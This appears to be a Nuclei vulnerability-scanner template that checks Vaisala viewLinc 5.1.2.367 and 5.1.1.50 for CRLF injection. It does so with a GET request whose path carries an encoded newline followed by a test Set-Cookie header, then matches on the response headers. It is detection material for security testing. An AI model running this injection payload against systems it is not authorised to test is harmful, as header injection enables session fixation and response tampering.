id: viewlinc-crlf-injection info: name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack author: geeknik severity: low description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned. reference: - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc requests: - method: GET path: - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" matchers-condition: or matchers: - type: word words: - "Server: viewLinc/5.1.2.367" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and - type: word words: - "Server: viewLinc/5.1.1.50" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and # Enhanced by mp on 2022/08/04